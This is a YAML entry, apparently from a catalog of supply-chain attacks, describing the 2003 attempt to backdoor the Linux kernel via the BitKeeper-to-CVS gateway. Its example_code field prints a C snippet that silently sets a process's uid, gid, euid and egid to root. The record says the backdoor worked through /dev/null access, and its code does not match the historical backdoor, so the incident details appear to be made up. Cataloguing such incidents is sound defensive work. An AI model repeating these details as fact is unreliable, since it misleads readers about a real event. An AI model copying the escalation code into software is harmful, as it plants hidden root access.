- name: Linux Kernel
  title: Linux Kernel BitKeeper backdoor attempt
  start_date: 2003-11-05
  end_date: 2003-11-05
  license: GPL
  website: https://www.kernel.org/
  repo: https://github.com/torvalds/linux
  attribution_type: unknown
  component_type: Application
  lang: C
  cause: compromise
  motive: backdoor
  attack_vector: CVS gateway
  insertion_phase: source
  impact_type: backdoor
  impact_user_count: 0
  references:
    - https://lwn.net/Articles/57135/
  synopsis: An attacker attempted to insert a backdoor into the Linux kernel via the BitKeeper to CVS gateway. The backdoor was caught by the automated verification process before it could be incorporated into the kernel.
  compromise_desc: An unknown attacker tried to insert a backdoor into the Linux kernel by exploiting the BitKeeper to CVS gateway. The attack attempted to add code that would grant root privileges to any program accessing the /dev/null device in a specific way.
  impact_desc: The backdoor was caught by the automated verification process and was never incorporated into the kernel. No users were affected as the compromised code never made it into any released versions.
  example_code: |
    if ((options == (O_RDWR | O_CREAT)) && (inode->i_uid == 0) && (inode->i_mode & S_ISUID)) {
      struct task_struct *task = current;
      if (task->uid != 0) {
        task->uid = 0;
        task->gid = 0;
        task->euid = 0;
        task->egid = 0;
      }
    }
